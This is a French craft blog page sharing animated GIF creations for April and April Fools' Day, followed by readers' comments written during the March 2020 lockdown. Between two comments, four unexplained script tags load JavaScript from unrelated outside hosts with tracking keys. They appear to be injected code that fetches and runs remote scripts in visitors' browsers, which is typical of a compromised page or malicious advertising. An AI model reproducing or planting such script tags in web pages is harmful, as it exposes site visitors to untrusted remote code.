• Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

     

    A l'heure où les angoisses se réveillent, à l'heure où l'on prend conscience que tout peut arriver, créons, rêvons, partageons, évadons nous....

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

    Les Créas du Mois d'Avril sont à retrouver dans la Rubrique "Mois"-"Avril" ICI

     

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

    Pour celle qui suit, je vous ai mis la dame dans la Rubrique "Mes Tubes"-"Femmes" ICI

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

     

    Voici une création pour le 1er Avril (sourire est important !) que vous pourrez retrouver, avec bien d'autres, dans la Rubrique "Fêtes"-"1er Avril" ICI

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     

     

     

     

    Mes Créas Mois d'Avril et 1er Avril pour Vous ♥♥♥

     


    Tags Tags : , , , , , , , , ,
  • Commentaires

    34
    Dimanche 29 Mars 2020 à 00:04

    Merci pour tout ceci !

    Bisous

    33
    Samedi 28 Mars 2020 à 16:13

    Bravo pour ces jolies créations ! En ce qui me concerne les jours se suivent et se ressemblent, je prends de mauvaises habitudes mais je suis si bien à me reposer !! :) 
    Merci pour tes belles images et surtout merci de m'avoir rappelée qu'on change d'heure cette nuit ^^ 
    Prends soin des tiens et de toi ! 
    Gros Bisous 

    32
    Vendredi 27 Mars 2020 à 13:31

    créeons Valie , créeons pour oublier cette chappe de plomb et de tristesse qui s abat sur nous et surtout restons solidaires entre nous bisous ma douce et bonne fin de semaine

    31
    Gaelle
    Vendredi 27 Mars 2020 à 13:23
    Tu as raison, creons et partageons, cela créé du lien et de l amitié.
    Merci beaucoup pour tes gifts.
    Biz
    Gaelle
    30
    Mercredi 25 Mars 2020 à 20:23

    Bonsoir ma douce Valie

    Tu as raison prenons garde à nous et profitons de cette mauvaise saison pour faire de belles créations

    qui nous permettent de garde le moral .

    Bone soirée et gros bisous

    ton amie Janine

    29
    Mercredi 25 Mars 2020 à 20:08

    bonsoir Valie un peu de couleur et de bonne humeur sur ton blog . bonne soirée et prend bien soin de toi et ta petite famille bisous liliane

    28
    Mercredi 25 Mars 2020 à 18:59

    très jolie blog ^^

    27
    Jacline-H-49
    Mercredi 25 Mars 2020 à 14:30

    Bonjour ma Valie, 

    du confinement, tu sais bien t'évader en créant de bien jolis Gifs et images, et tu les partages avec nous, tes aminautes, ce qui est louable, Merci, c'est toujours un plaisir de venir chez toi.

    Reste vigilante à cause de qui tu sais, ce ballon rond épineux et si silencieux. Les tiens doivent aussi se protéger, et penser que tout peut être contaminé, même ta carte bancaire ou ton porte monnaie. Une seule idée en teête "se laver les mains ou employer le gel hydroalcool" même avant de mettre les pieds dans la maison ! Les objets infectés doivent rester à l'air libre plusieurs heures et selon le support.

    Bon après midi chère Valie

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    26
    Mercredi 25 Mars 2020 à 08:43

    Merci Valie de nous offrir le rêve avec cette page accompagnée de tes créations si belles. Prends soin de toi. Je t'embrasse.

    25
    Mercredi 25 Mars 2020 à 07:12

    Coucou Valie, merci pour toutes ces créas, j'aime beaucoup l'humour du petit poisson, trop drôle.

    Merci pour ton message hier, je viens de refaire un post suite au nouveau cafouillage de CB.

    Gros bisous, bonne journée.

    24
    Mardi 24 Mars 2020 à 20:03

    Bonsoir ma douce Valie

    Merci pour tes magnifiques créations animées pour le mois d'avril  et pour le gentil partage

    J'espère que tu vas bien et que tu gardes le moral ?

    Je te souhaite une bonne et douce soirée

    gros bisous d'amitié

    Janine

    23
    Mardi 24 Mars 2020 à 18:03

    Un grand merci pour tes jolies réas.
    Prends bien soin de toi.
    Gros bisous.

    22
    Tite-C.
    Mardi 24 Mars 2020 à 16:28

    https://i.postimg.cc/XYTnqWWK/c-super-evy.gifTrès beaux partages ma chère Valie, bisous xoxo

    21
    Mardi 24 Mars 2020 à 14:58

    Merci pour ces jolis gifs j'en ai profité pour piquer aussi celui ton cœur qui sauve des vies! Bises Nadine

    20
    marianne
    Mardi 24 Mars 2020 à 13:04

    Toujours aussi superbes, merci ma belle !!

    Gros bisous

    Marianne

    19
    Mardi 24 Mars 2020 à 12:31

    comme toujours des creations superbes

    bisous

    18
    Mardi 24 Mars 2020 à 12:20

    Très belles tes créations comme toujours et merci pour ton partage!! Pour le moment beaucoup d'occupations à faire aussi à la maison pour occuper nos esprits.....

    Gros bisous et surtout prends bien soin de toi et des tiens

    17
    Mardi 24 Mars 2020 à 12:20

    Tu as raison Valie de nous offrir des petits moments pour rêver un peu...ça ne s'oublie pas.Continuons..nous,nous faisons du bien et aux autres également.Très jolie partage.

    Douce journée.

    Gros bisous.Merci a Toi*

    16
    Mardi 24 Mars 2020 à 12:04

    C'est vrai que c'est bientôt le 1er avril... Je n'y avais pas du tout pensé !

    Bises

    thaly

    15
    mamijojo77100
    Mardi 24 Mars 2020 à 12:01

    merci ma valie de continuer de creer pour nous toutes et nous etes agreable.. je rejoins patoune que font les gens qui n'ont pas de passion et sans occupations.et dieu sait s il y a a faire chez soi..ceux qui veulent faire leur jogging et prendre l air, c est le moment d aller aider les agriculteurs qui ont besoin. GBISOUS  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1585047444781" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
    14
    Mardi 24 Mars 2020 à 10:52

    Coucou ma belle Valie, merci de mettre du bonheur dans nos vies, elles sont très mignonnes très créations. Passe une fin de journée, bisou rose tendresse !

    13
    Mardi 24 Mars 2020 à 10:21

    Bravo pour ces jolies créations. Cette année pâques risque d'être bien triste. Bonne journée. Bisous

    12
    Mardi 24 Mars 2020 à 10:17

    belle page Valie 

    le 1 avril ne se fêtera pas beaucoup cette année , hélas

    prends soin de toi

    bisous

    11
    Mardi 24 Mars 2020 à 09:55

    Merci Valie pour tes créations

    j'adore les poissons trop mignons  .

    Bisous prends bien soin de toi et de ta famille .

    10
    Mardi 24 Mars 2020 à 09:54

    Et oui nous nous changeons les idées en créant, une façon de nous évader dans notre tête, et il le faut pour notre moral

    Passe une bonne journée

    9
    Mardi 24 Mars 2020 à 09:29

      merci  pour  ces  belles  créas  qui  vont  venir   décorer   blog  et  groupe 

       gros  bisous

    8
    Jour de Mai
    Mardi 24 Mars 2020 à 09:13

    Coucou Valie, 

    Tu as raison, la création libère l'esprit, on s'occupe et toi en plus tu partages, merci beaucoup et Bravo à toi !

    Surtout prends bien soin de toi et des tiens. 

    Excellent mardi, autant que faire se peut. 

    De très gros bisous ♥♥♥

    LN 

    7
    Mardi 24 Mars 2020 à 09:08

    Vos  mots.ma chère et douce Valie et merci pour tes superbes creations et tes textes d encouragement qui m aident beaucoup en ces temps difficiles pour tout le monde, tout est toujours très raffiné chez toi , alors bon mardi et essayons de garder le sourire en créeant bisous tendresse

    6
    Mardi 24 Mars 2020 à 09:01

    Merci pour le partage de tes belles créations ma Douce Valie.

    Nous avons cette chance, nous toutes qui aimons tous styles de loisirs créatifs, d'avoir les mains & l'esprit occupés en cette période de confinement. Je me demande ce que font les gens qui n'ont aucune passion pas même la lecture ??

    A très vite de te lire, prenez bien soin de vous.

    Mille Bisous affectueux.

    5
    Mardi 24 Mars 2020 à 08:53

    merci valie pour tes belles créas

    bisous

    4
    Mardi 24 Mars 2020 à 08:50

    Merci Valie pour ces très jolies créations ;

    bonne journée ; bisous * Nicole

    3
    winie166
    Mardi 24 Mars 2020 à 08:44
    merci ! et bonne continuation bisous
    2
    Mardi 24 Mars 2020 à 08:37

    Bonjour Valie

    merci pour tes magnifiques créas

    nous avons la chance que le temps

    permette de sortir dans le jardin !

    Prends bien soin de toi et des tiens

    Bisous

    1
    Mardi 24 Mars 2020 à 08:28

    Bonjour ma Valie, merci pour ces belles créations... de bien belles occupations... pour le moment tant qu'il fait beau je jardine, un peu dur pour moi car je m'essouffle très vite mais bon, de prendre l'air me fait le plus grand bien aussi ...

    Je te souhaite une journée agréable

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :